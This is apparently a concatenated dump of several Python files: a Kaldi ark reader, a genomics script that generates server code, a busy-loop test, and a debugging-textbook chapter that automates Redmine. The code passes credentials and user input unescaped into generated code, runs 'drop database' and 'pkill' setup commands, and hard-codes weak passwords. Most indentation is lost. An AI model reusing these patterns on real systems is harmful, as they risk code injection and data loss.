if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if m.dtype == 'float32': fd.write('FM '.encode())
elif m.dtype == 'float64': fd.write('DM '.encode())
else: raise UnsupportedDataType("'%s', please use 'float32' or 'float64'" % m.dtype)
# Dims,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[0])) # rows
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[1])) # cols
# Data,
fd.write(m.tobytes())
finally:
if fd is not file_or_fd : fd.close()
#################################################
# 'Posterior' kaldi type (posteriors, confusion network, nnet1 training targets, ...)
# Corresponds to: vector<vector<tuple<int,float> > >
# - outer vector: time axis
# - inner vector: records at the time
# - tuple: int = index, float = value
#
def read_cnet_ark(file_or_fd):
""" Alias of function 'read_post_ark()', 'cnet' = confusion network """
return read_post_ark(file_or_fd)
def read_post_ark(file_or_fd):
""" generator(key,vec<vec<int,float>>) = read_post_ark(file)
Returns generator of (key,posterior) tuples, read from ark file.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Iterate the ark:
for key,post in kaldi_io.read_post_ark(file):
...
Read ark to a 'dictionary':
d = { key:post for key,post in kaldi_io.read_post_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
post = read_post(fd)
yield key, post
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_post(file_or_fd):
""" [post] = read_post(file_or_fd)
Reads single kaldi 'Posterior' in binary format.
The 'Posterior' is C++ type 'vector<vector<tuple<int,float> > >',
the outer-vector is usually time axis, inner-vector are the records
at given time, and the tuple is composed of an 'index' (integer)
and a 'float-value'. The 'float-value' can represent a probability
or any other numeric value.
Returns vector of vectors of tuples.
"""
fd = open_or_fd(file_or_fd)
ans=[]
binary = fd.read(2).decode(); assert(binary == '\0B'); # binary flag
assert(fd.read(1).decode() == '\4'); # int-size
outer_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of frames (or bins)
# Loop over 'outer-vector',
for i in range(outer_vec_size):
assert(fd.read(1).decode() == '\4'); # int-size
inner_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of records for frame (or bin)
data = np.frombuffer(fd.read(inner_vec_size*10), dtype=[('size_idx','int8'),('idx','int32'),('size_post','int8'),('post','float32')], count=inner_vec_size)
assert(data[0]['size_idx'] == 4)
assert(data[0]['size_post'] == 4)
ans.append(data[['idx','post']].tolist())
if fd is not file_or_fd: fd.close()
return ans
#################################################
# Kaldi Confusion Network bin begin/end times,
# (kaldi stores CNs time info separately from the Posterior).
#
def read_cntime_ark(file_or_fd):
""" generator(key,vec<tuple<float,float>>) = read_cntime_ark(file_or_fd)
Returns generator of (key,cntime) tuples, read from ark file.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Iterate the ark:
for key,time in kaldi_io.read_cntime_ark(file):
...
Read ark to a 'dictionary':
d = { key:time for key,time in kaldi_io.read_post_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
cntime = read_cntime(fd)
yield key, cntime
key = read_key(fd)
finally:
if fd is not file_or_fd : fd.close()
def read_cntime(file_or_fd):
""" [cntime] = read_cntime(file_or_fd)
Reads single kaldi 'Confusion Network time info', in binary format:
C++ type: vector<tuple<float,float> >.
(begin/end times of bins at the confusion network).
Binary layout is '<num-bins> <beg1> <end1> <beg2> <end2> ...'
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Returns vector of tuples.
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode(); assert(binary == '\0B'); # assuming it's binary
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of frames (or bins)
data = np.frombuffer(fd.read(vec_size*10), dtype=[('size_beg','int8'),('t_beg','float32'),('size_end','int8'),('t_end','float32')], count=vec_size)
assert(data[0]['size_beg'] == 4)
assert(data[0]['size_end'] == 4)
ans = data[['t_beg','t_end']].tolist() # Return vector of tuples (t_beg,t_end),
if fd is not file_or_fd : fd.close()
return ans
#################################################
# Segments related,
#
# Segments as 'Bool vectors' can be handy,
# - for 'superposing' the segmentations,
# - for frame-selection in Speaker-ID experiments,
def read_segments_as_bool_vec(segments_file):
""" [ bool_vec ] = read_segments_as_bool_vec(segments_file)
using kaldi 'segments' file for 1 wav, format : '<utt> <rec> <t-beg> <t-end>'
- t-beg, t-end is in seconds,
- assumed 100 frames/second,
"""
segs = np.loadtxt(segments_file, dtype='object,object,f,f', ndmin=1)
# Sanity checks,
assert(len(segs) > 0) # empty segmentation is an error,
assert(len(np.unique([rec[1] for rec in segs ])) == 1) # segments with only 1 wav-file,
# Convert time to frame-indexes,
start = np.rint([100 * rec[2] for rec in segs]).astype(int)
end = np.rint([100 * rec[3] for rec in segs]).astype(int)
# Taken from 'read_lab_to_bool_vec', htk.py,
frms = np.repeat(np.r_[np.tile([False,True], len(end)), False],
np.r_[np.c_[start - np.r_[0, end[:-1]], end-start].flat, 0])
assert np.sum(end-start) == np.sum(frms)
return frms
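# --- Usage sketch (illustrative, not part of the original module) ---
# read_segments_as_bool_vec() hands its argument straight to np.loadtxt(), so an
# in-memory 'segments' file can be used for a quick check. Under the assumed
# 100 frames/second, the two hypothetical segments below cover frames 0-49 and
# 100-119, giving a 120-element vector with 70 True entries.
if __name__ == '__main__':
    import io
    example_segments = io.StringIO("utt1 rec1 0.00 0.50\nutt2 rec1 1.00 1.20\n")
    example_vec = read_segments_as_bool_vec(example_segments)
    print(len(example_vec), int(np.sum(example_vec)))  # expected: 120 70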
|
coords_cohort_1_source_builder.py
|
#!/usr/bin/env python
"""
-------------
Copyright (c) 2015. Genome Research Ltd.
Author: Deciphering Development Disorders Project Team.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
---------------
"""
## Description = This script is not meant to be used directly by the user; it is, however, used inside the GUI.
## This script creates another python script called current_run.py that is executed on the server.
## It takes the user-defined parameters and puts them in the current_run.py template.
## This script embeds some function and class definitions found in parsing_setups.py
import os
import argparse
## the command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('--o', type=str, default=None, help='The output path of current_run.py.')
parser.add_argument('--gui_path', type=str, default=None, help='The absolute path of the GUI.')
parser.add_argument('--remote_dir', type=str, default=None, help='The name of the remote temporary directory.')
parser.add_argument('--chrom', type=str, default=None, help='User-defined chromosome.')
parser.add_argument('--start', type=str, default=None, help='User-defined start.')
parser.add_argument('--stop', type=str, default=None, help='User-defined stop.')
parser.add_argument('--cq', type=str, default=None, help='User-defined comma-separated consequence.')
parser.add_argument('--max_af_cutoff', type=str, default=None, help='User-defined MAX AF cutoff.')
parser.add_argument('--max_af_value', type=str, default=None, help='User-defined MAX AF value.')
parser.add_argument('--string_user_settings_dict', type=str, default=None, help='User credentials.')
## prepare argument variables
args = parser.parse_args()
gui_path = args.gui_path
out = args.o
backend_dir = args.remote_dir
chrom = args.chrom
start = args.start
stop = args.stop
cq = args.cq
max_af_cutoff = args.max_af_cutoff
max_af_value = args.max_af_value
string_user_settings_dict = args.string_user_settings_dict
## the template of current_run.py in the form of a string
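## Literal braces in the template are doubled ('{{' and '}}') so that the
## str.format() call below leaves them intact in the generated current_run.py.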
template = r"""
remote_dir = '{builder_backend_dir}'
import multiprocessing
import gzip
chrom = '{builder_chrom}'
start = '{builder_start}'
stop = '{builder_stop}'
cq = '{builder_cq}'
max_af_cutoff = '{builder_max_af_cutoff}'
max_af_value = '{builder_max_af_value}'
string_user_settings_dict = '{builder_string_user_settings_dict}'
user_settings_dict = {{}}
for i in string_user_settings_dict.split(';'):
temp = i.split(':')
user_settings_dict[temp[0]] = temp[1]
import json
json_dict = dict()
## The multiprocessing function.
def mp_func(a, b, chrom=chrom, start=start, stop=stop, cq_definitions=cq, max_af_cutoff=max_af_cutoff, max_af_value=max_af_value):
output_file_name = remote_dir + 'f_'+str(a)+'_'+str(b)+'.tsv.gz'
out = gzip.open(output_file_name, 'wb') ## open a compressed file used to write to
for tup in vcf_paths[a:b]:
person_id, person_vcf = tup
if (os.access(person_vcf, os.F_OK) and os.access(person_vcf, os.R_OK)):
vcf_generator = tabix_vcf(person_vcf, chrom, start, stop)
condition = True
while (condition):
my_rec = next(vcf_generator, False)
if (my_rec):
obj = Record(my_rec, cq_definitions, max_af_cutoff, max_af_value)
if (obj.validate_cq() and obj.validate_max_af_cutoff() and obj.validate_max_af_value()):
out.write('{{}}\t{{}}\n'.format(person_id, obj.get_variant_line()))
else:
condition = my_rec
out.close()
json_dict['error_msgs'] = ''
try:
cq_list = prepare_cq(cq)
get_all_current_vcfs_sql_statement = r"select person_stable_id,tmp_path from dataset where tmp_path like '%/vcfs/%uber%' and data_freeze_id = (select data_freeze_id from data_freeze where is_current = 't');"
vcf_paths = ddd_prod_connect_and_fetch(get_all_current_vcfs_sql_statement, user_settings_dict)
ind = list(range(0,len(vcf_paths),500))
ind[-1] = len(vcf_paths) ## replace last index by length of list
for i in range(0, len(ind)-1):
multiprocessing.Process(target=mp_func, args=(ind[i], ind[i+1])).start()
json_dict['error_msgs'] = 'No_error'
with open(remote_dir+'cohort_variants.json', 'w') as out:
json.dump(json_dict, out)
except:
json_dict['error_msgs'] = 'Error'
with open(remote_dir+'cohort_variants.json', 'w') as out:
json.dump(json_dict, out)
""".format(builder_backend_dir=backend_dir, builder_chrom=chrom, builder_start=start, builder_stop=stop, builder_cq=cq, builder_max_af_cutoff=max_af_cutoff, builder_max_af_value=max_af_value, builder_string_user_settings_dict=string_user_settings_dict)
## add the function and class definitions
with open('{}local_scripts/parsing_setups.py'.format(gui_path), 'r') as defins:
defins = defins.read()
## write current_run.py
with open(out, 'w') as outfile:
outfile.write('\n'.join([defins, template]))
|
threaded_busy.py
|
# Copyright 2016 Uber Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import threading
def do_sleep():
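    # Despite its name, this is a deliberate busy-wait: the loop never sleeps
    # or yields, so each thread running it stays fully CPU-bound.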
while True:
pass
def main():
sys.stdout.write('%d\n' % (os.getpid(), ))
sys.stdout.flush()
thread = threading.Thread(target=do_sleep)
thread.start()
do_sleep()
if __name__ == '__main__':
main()
|
Tracking.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# "Tracking Bugs" - a chapter of "The Debugging Book"
# Web site: https://www.debuggingbook.org/html/Tracking.html
# Last change: 2022-01-17 14:10:37+01:00
#
# Copyright (c) 2021 CISPA Helmholtz Center for Information Security
# Copyright (c) 2018-2020 Saarland University, authors, and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
r'''
The Debugging Book - Tracking Bugs
This file can be _executed_ as a script, running all experiments:
$ python Tracking.py
or _imported_ as a package, providing classes, functions, and constants:
>>> from debuggingbook.Tracking import <identifier>
but before you do so, _read_ it and _interact_ with it at:
https://www.debuggingbook.org/html/Tracking.html
This chapter provides no functionality that could be used by third-party code.
For more details, source, and documentation, see
"The Debugging Book - Tracking Bugs"
at https://www.debuggingbook.org/html/Tracking.html
'''
# Allow to use 'from . import <module>' when run as script (cf. PEP 366)
if __name__ == '__main__' and __package__ is None:
__package__ = 'debuggingbook'
# Tracking Bugs
# =============
if __name__ == '__main__':
print('# Tracking Bugs')
if __name__ == '__main__':
from .bookutils import YouTubeVideo
YouTubeVideo("bJzHYzvxHm8")
if __name__ == '__main__':
# We use the same fixed seed as the notebook to ensure consistency
import random
random.seed(2001)
from . import Intro_Debugging
import os
import sys
if __name__ == '__main__':
if 'CI' in os.environ:
# Can't run this in our continuous environment,
# since it can't run a headless Web browser
sys.exit(0)
if __name__ == '__main__':
assert os.getenv('USER') == 'zeller'
## Synopsis
## --------
if __name__ == '__main__':
print('\n## Synopsis')
## Reporting Issues
## ----------------
if __name__ == '__main__':
print('\n## Reporting Issues')
### What Goes in a Bug Report?
if __name__ == '__main__':
print('\n### What Goes in a Bug Report?')
#### Steps to Reproduce (83%)
if __name__ == '__main__':
print('\n#### Steps to Reproduce (83%)')
#### Stack Traces (57%)
if __name__ == '__main__':
print('\n#### Stack Traces (57%)')
#### Test Cases (51%)
if __name__ == '__main__':
print('\n#### Test Cases (51%)')
#### Observed Behavior (33%)
if __name__ == '__main__':
print('\n#### Observed Behavior (33%)')
#### Screenshots (26%)
if __name__ == '__main__':
print('\n#### Screenshots (26%)')
#### Expected Behavior (22%)
if __name__ == '__main__':
print('\n#### Expected Behavior (22%)')
#### Configuration Information (< 12%)
if __name__ == '__main__':
print('\n#### Configuration Information (< 12%)')
### Reporting Crashes Automatically
if __name__ == '__main__':
print('\n### Reporting Crashes Automatically')
### Effective Issue Reporting
if __name__ == '__main__':
print('\n### Effective Issue Reporting')
## An Issue Tracker
## ----------------
if __name__ == '__main__':
print('\n## An Issue Tracker')
### Excursion: Setting up Redmine
if __name__ == '__main__':
print('\n### Excursion: Setting up Redmine')
import subprocess
import os
import sys
def with_ruby(cmd: str, inp: str = '', timeout: int = 30, show_stdout: bool = False) -> None:
print(f"$ {cmd}")
shell = subprocess.Popen(['/bin/sh', '-c',
f'''rvm_redmine=$HOME/.rvm/gems/ruby-2.7.2@redmine; \
rvm_global=$HOME/.rvm/gems/ruby-2.7.2@global; \
export GEM_PATH=$rvm_redmine:$rvm_global; \
export PATH=$rvm_redmine/bin:$rvm_global/bin:$HOME/.rvm/rubies/ruby-2.7.2/bin:$HOME/.rvm/bin:$PATH; \
cd $HOME/lib/redmine && {cmd}'''],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
try:
stdout_data, stderr_data = shell.communicate(inp, timeout=timeout)
except subprocess.TimeoutExpired:
shell.kill()
# stdout_data, stderr_data = shell.communicate(inp)
# if show_stdout:
# print(stdout_data, end="")
# print(stderr_data, file=sys.stderr, end="")
raise
print(stderr_data, file=sys.stderr, end="")
if show_stdout:
print(stdout_data, end="")
def with_mysql(cmd: str, timeout: int = 2, show_stdout: bool = False) -> None:
print(f"sql>{cmd}")
sql = subprocess.Popen(["mysql", "-u", "root",
"--default-character-set=utf8mb4"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
try:
stdout_data, stderr_data = sql.communicate(cmd + ';',
timeout=timeout)
except subprocess.TimeoutExpired:
sql.kill()
# stdout_data, stderr_data = sql.communicate(inp)
# if show_stdout:
# print(stdout_data, end="")
# print(stderr_data, file=sys.stderr, end="")
raise
print(stderr_data, file=sys.stderr, end="")
if show_stdout:
print(stdout_data, end="")
if __name__ == '__main__':
with_ruby("bundle config set without development test")
if __name__ == '__main__':
with_ruby("bundle install")
if __name__ == '__main__':
with_ruby("pkill sql; sleep 5")
if __name__ == '__main__':
try:
with_ruby("mysql.server start", show_stdout=True)
except subprocess.TimeoutExpired:
pass # Can actually start without producing output
if __name__ == '__main__':
with_mysql("drop database redmine")
if __name__ == '__main__':
with_mysql("drop user 'redmine'@'localhost'")
if __name__ == '__main__':
with_mysql("create database redmine character set utf8")
if __name__ == '__main__':
with_mysql("create user 'redmine'@'localhost' identified by 'my_password'")
if __name__ == '__main__':
with_mysql("grant all privileges on redmine.* to 'redmine'@'localhost'")
if __name__ == '__main__':
with_ruby("bundle exec rake generate_secret_token")
if __name__ == '__main__':
with_ruby("RAILS_ENV=production bundle exec rake db:migrate")
if __name__ == '__main__':
with_ruby("RAILS_ENV=production bundle exec rake redmine:load_default_data", '\n')
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
### Excursion: Starting Redmine
if __name__ == '__main__':
print('\n### Excursion: Starting Redmine')
import os
import time
from multiprocess import Process # type: ignore
from typing import Tuple
def run_redmine(port: int) -> None:
with_ruby(f'exec rails s -e production -p {port} > redmine.log 2>&1',
timeout=3600)
def start_redmine(port: int = 3000) -> Tuple[Process, str]:
process = Process(target=run_redmine, args=(port,))
process.start()
time.sleep(5)
url = f"http://localhost:{port}"
return process, url
if __name__ == '__main__':
redmine_process, redmine_url = start_redmine()
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
### Excursion: Remote Control with Selenium
if __name__ == '__main__':
print('\n### Excursion: Remote Control with Selenium')
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
BROWSER = 'firefox'
if __name__ == '__main__':
with_ruby("pkill Firefox.app firefox-bin")
from .bookutils import rich_output
HEADLESS = True
from selenium.webdriver.remote.webdriver import WebDriver
def start_webdriver(browser: str = BROWSER, headless: bool = HEADLESS, zoom: float = 4.0) -> WebDriver:
if browser == 'firefox':
options = webdriver.FirefoxOptions()
if browser == 'chrome':
options = webdriver.ChromeOptions()
if headless and browser == 'chrome':
options.add_argument('headless')
else:
options.headless = headless
# Start the browser, and obtain a _web driver_ object such that we can interact with it.
if browser == 'firefox':
# For firefox, set a higher resolution for our screenshots
profile = webdriver.firefox.firefox_profile.FirefoxProfile()
profile.set_preference("layout.css.devPixelsPerPx", repr(zoom))
redmine_gui = webdriver.Firefox(firefox_profile=profile, options=options)
# We set the window size such that it fits
redmine_gui.set_window_size(500, 600) # was 1024, 600
elif browser == 'chrome':
redmine_gui = webdriver.Chrome(options=options)
redmine_gui.set_window_size(1024, 510 if headless else 640)
return redmine_gui
if __name__ == '__main__':
redmine_gui = start_webdriver(browser=BROWSER, headless=HEADLESS)
if __name__ == '__main__':
redmine_gui.get(redmine_url)
if __name__ == '__main__':
from IPython.display import display, Image
if __name__ == '__main__':
Image(redmine_gui.get_screenshot_as_png())
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
### Excursion: Screenshots with Drop Shadows
if __name__ == '__main__':
print('\n### Excursion: Screenshots with Drop Shadows')
import tempfile
def drop_shadow(contents: bytes) -> bytes:
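    # Descriptive comment (added): pipe the PNG bytes through ImageMagick's
    # `convert` to composite a soft drop shadow behind the screenshot and
    # return the processed PNG bytes.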
with tempfile.NamedTemporaryFile() as tmp:
tmp.write(contents)
convert = subprocess.Popen(
['convert', tmp.name,
'(', '+clone', '-background', 'black', '-shadow', '50x10+15+15', ')',
'+swap', '-background', 'none', '-layers', 'merge', '+repage', '-'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout_data, stderr_data = convert.communicate()
if stderr_data:
print(stderr_data.decode("utf-8"), file=sys.stderr, end="")
return stdout_data
def screenshot(driver: WebDriver, width: int = 500) -> bytes:
    return Image(drop_shadow(driver.get_screenshot_as_png()), width=width)
if __name__ == '__main__':
screenshot(redmine_gui)
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
### Excursion: First Registration at Redmine
if __name__ == '__main__':
print('\n### Excursion: First Registration at Redmine')
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/login')
if __name__ == '__main__':
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.find_element_by_id("username").send_keys("admin")
redmine_gui.find_element_by_id("password").send_keys("admin")
redmine_gui.find_element_by_name("login").click()
if __name__ == '__main__':
time.sleep(2)
if __name__ == '__main__':
if redmine_gui.current_url.endswith('my/password'):
redmine_gui.get(redmine_url + '/my/password')
redmine_gui.find_element_by_id("password").send_keys("admin")
redmine_gui.find_element_by_id("new_password").send_keys("admin001")
redmine_gui.find_element_by_id("new_password_confirmation").send_keys("admin001")
display(screenshot(redmine_gui))
redmine_gui.find_element_by_name("commit").click()
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/logout')
redmine_gui.find_element_by_name("commit").click()
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/login')
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.find_element_by_id("username").send_keys("admin")
redmine_gui.find_element_by_id("password").send_keys("admin001")
redmine_gui.find_element_by_name("login").click()
screenshot(redmine_gui)
### Excursion: Creating a Project
if __name__ == '__main__':
print('\n### Excursion: Creating a Project')
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/projects')
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/projects/new')
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/projects/new')
redmine_gui.find_element_by_id('project_name').send_keys("The Debugging Book")
redmine_gui.find_element_by_id('project_description').send_keys("A Book on Automated Debugging")
redmine_gui.find_element_by_id('project_identifier').clear()
redmine_gui.find_element_by_id('project_identifier').send_keys("debuggingbook")
redmine_gui.find_element_by_id('project_homepage').send_keys("https://www.debuggingbook.org/")
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.find_element_by_name('commit').click()
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/projects')
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/projects/debuggingbook')
screenshot(redmine_gui)
## Reporting an Issue
## ------------------
if __name__ == '__main__':
print('\n## Reporting an Issue')
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/issues/new')
screenshot(redmine_gui)
if __name__ == '__main__':
issue_title = "Does not render correctly on Nokia Communicator"
if __name__ == '__main__':
issue_description = \
"""The Debugging Book does not render correctly on the Nokia Communicator 9000.
Steps to reproduce:
1. On the Nokia, go to "https://debuggingbook.org/"
2. From the menu on top, select the chapter "Tracking Origins".
3. Scroll down to a place where a graph is supposed to be shown.
4. Instead of the graph, only a blank space is displayed.
How to fix:
* The graphs seem to come as SVG elements, but the Nokia Communicator does not support SVG rendering. Render them as JPEGs instead.
"""
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/issues/new')
redmine_gui.find_element_by_id('issue_subject').send_keys(issue_title)
redmine_gui.find_element_by_id('issue_description').send_keys(issue_description)
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.find_element_by_id('issue_assigned_to_id').click()
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.execute_script("window.scrollTo(0, document.body.scrollHeight);")
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.find_element_by_name('commit').click()
screenshot(redmine_gui)
from .bookutils import quiz
if __name__ == '__main__':
quiz("How many issues have been reported over time in Mozilla Bugzilla?",
[
"More than ten thousand",
"More than a hundred thousand",
"More than a million",
"More than ten million"
], '370370367 // 123456789')
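# (The correct answer appears to be encoded as an expression that evaluates to the
# option index: 370370367 // 123456789 == 3, i.e. "More than a million".)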
if __name__ == '__main__':
redmine_gui.get("https://bugzilla.mozilla.org/buglist.cgi?quicksearch=firefox")
if __name__ == '__main__':
screenshot(redmine_gui)
### Excursion: Adding Some More Issue Reports
if __name__ == '__main__':
print('\n### Excursion: Adding Some More Issue Reports')
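# new_issue() files a fresh issue via the Redmine web UI and returns a screenshot
# of the resulting page.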
def new_issue(issue_title: str, issue_description: str) -> Image:
redmine_gui.get(redmine_url + '/issues/new')
redmine_gui.find_element_by_id('issue_subject').send_keys(issue_title)
redmine_gui.find_element_by_id('issue_description').send_keys(issue_description)
redmine_gui.find_element_by_name('commit').click()
return screenshot(redmine_gui)
if __name__ == '__main__':
new_issue("Missing a Chapter on Parallel Debugging",
"""I am missing a chapter on (automatic) debugging of parallel and distributed systems,
including how to detect and repair data races, log message passing, and more.
In my experience, almost all programs are parallel today, so you are missing
an important subject.
""")
if __name__ == '__main__':
new_issue("Missing a PDF version",
"""Your 'book' does not provide a printed version. I think that printed books
* offer a more enjoyable experience for the reader
* allow me to annotate pages with my own remarks
* allow me to set dog-ear bookmarks
* allow me to show off what I'm currently reading (do you have a cover, too?)
Please provide a printed version - or, at least, produce a PDF version
of the debugging book, and make it available for download, such that I can print it myself.
""")
if __name__ == '__main__':
new_issue("No PDF version",
"""Can I have a printed version of your book? Please!""")
if __name__ == '__main__':
new_issue("Does not work with Python 2.7 or earlier",
"""I was deeply disappointed that your hew book requires Python 3.9 or later.
There are still several Python 2.x users out here (I, for one, cannot stand having to
type parentheses for every `print` statement), and I would love to run your code on
my Python 2.7 programs.
Would it be possible to backport the book's code such that it would run on Python 3.x
as well as Python 2.x? I would suggest that you add simple checks around your code
such as the following:
```
import sys
if sys.version_info.major >= 3:
print("The result is", x)
else:
print "The result is", x
```
As an alternative, rewrite the book in Python 2 and have it automatically translate to
Python 3. This way, you could address all Python lovers, not just Python 3 ones.
""")
if __name__ == '__main__':
new_issue("Support for C++",
"""I had lots of fun with your 'debugging book'. Yet, I was somewhat disappointed
to see that all code examples are in and for Python programs only. Is there a chance
to get them to work on a real programming language such as C or C++? This would also
open the way to discuss several new debugging techniques for bugs that occur in these
languages only. A chapter on C++ move semantics, and how to fix them, for instance,
would be highly appreciated.
""")
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
## Managing Issues
## ---------------
if __name__ == '__main__':
print('\n## Managing Issues')
if __name__ == '__main__':
redmine_gui.get(redmine_url + "/projects/debuggingbook")
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/projects/debuggingbook/issues')
redmine_gui.execute_script("window.scrollTo(0, document.body.scrollHeight);")
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.get(redmine_url + "/issues/")
if __name__ == '__main__':
redmine_gui.find_element_by_xpath("//tr[@id='issue-2']//a[@title='Actions']").click()
time.sleep(0.25)
if __name__ == '__main__':
tracker_item = redmine_gui.find_element_by_xpath(
"//div[@id='context-menu']//a[text()='Tracker']")
actions = webdriver.ActionChains(redmine_gui)
actions.move_to_element(tracker_item)
actions.perform()
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.find_element_by_xpath("//div[@id='context-menu']//a[text()='Feature']").click()
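# mark_tracker() opens the "Actions" context menu of the given issue and sets its
# tracker (e.g. "Feature").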
def mark_tracker(issue: int, tracker: str) -> None:
redmine_gui.get(redmine_url + "/issues/")
redmine_gui.find_element_by_xpath(
f"//tr[@id='issue-{str(issue)}']//a[@title='Actions']").click()
time.sleep(0.25)
tracker_item = redmine_gui.find_element_by_xpath(
"//div[@id='context-menu']//a[text()='Tracker']")
actions = webdriver.ActionChains(redmine_gui)
actions.move_to_element(tracker_item)
actions.perform()
time.sleep(0.25)
redmine_gui.find_element_by_xpath(
f"//div[@id='context-menu']//a[text()='{tracker}']").click()
if __name__ == '__main__':
mark_tracker(3, "Feature")
mark_tracker(4, "Feature")
mark_tracker(6, "Feature")
if __name__ == '__main__':
redmine_gui.get(redmine_url + "/issues/")
redmine_gui.execute_script("window.scrollTo(0, document.body.scrollHeight);")
screenshot(redmine_gui)
## Assigning Priorities
## --------------------
if __name__ == '__main__':
print('\n## Assigning Priorities')
if __name__ == '__main__':
redmine_gui.get(redmine_url + "/issues/")
if __name__ == '__main__':
redmine_gui.find_element_by_xpath("//tr[@id='issue-1']//a[@title='Actions']").click()
time.sleep(0.25)
if __name__ == '__main__':
priority_item = redmine_gui.find_element_by_xpath("//div[@id='context-menu']//a[text()='Priority']")
actions = webdriver.ActionChains(redmine_gui)
actions.move_to_element(priority_item)
actions.perform()
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.find_element_by_xpath("//div[@id='context-menu']//a[text()='Urgent']").click()
if __name__ == '__main__':
redmine_gui.get(redmine_url + "/issues/")
redmine_gui.execute_script("window.scrollTo(0, document.body.scrollHeight);")
screenshot(redmine_gui)
## Assigning Issues
## ----------------
if __name__ == '__main__':
print('\n## Assigning Issues')
if __name__ == '__main__':
redmine_gui.get(redmine_url + "/issues/")
if __name__ == '__main__':
redmine_gui.find_element_by_xpath("//tr[@id='issue-1']//a[@title='Actions']").click()
time.sleep(0.25)
if __name__ == '__main__':
assignee_item = redmine_gui.find_element_by_xpath(
"//div[@id='context-menu']//a[text()='Assignee']")
actions = webdriver.ActionChains(redmine_gui)
actions.move_to_element(assignee_item)
actions.perform()
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.find_element_by_xpath("//div[@id='context-menu']//a[text()='<< me >>']").click()
screenshot(redmine_gui)
## Resolving Issues
## ----------------
if __name__ == '__main__':
print('\n## Resolving Issues')
if __name__ == '__main__':
redmine_gui.get(redmine_url + "/projects/debuggingbook/issues?query_id=1")
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.get(redmine_url + "/issues/1")
screenshot(redmine_gui)
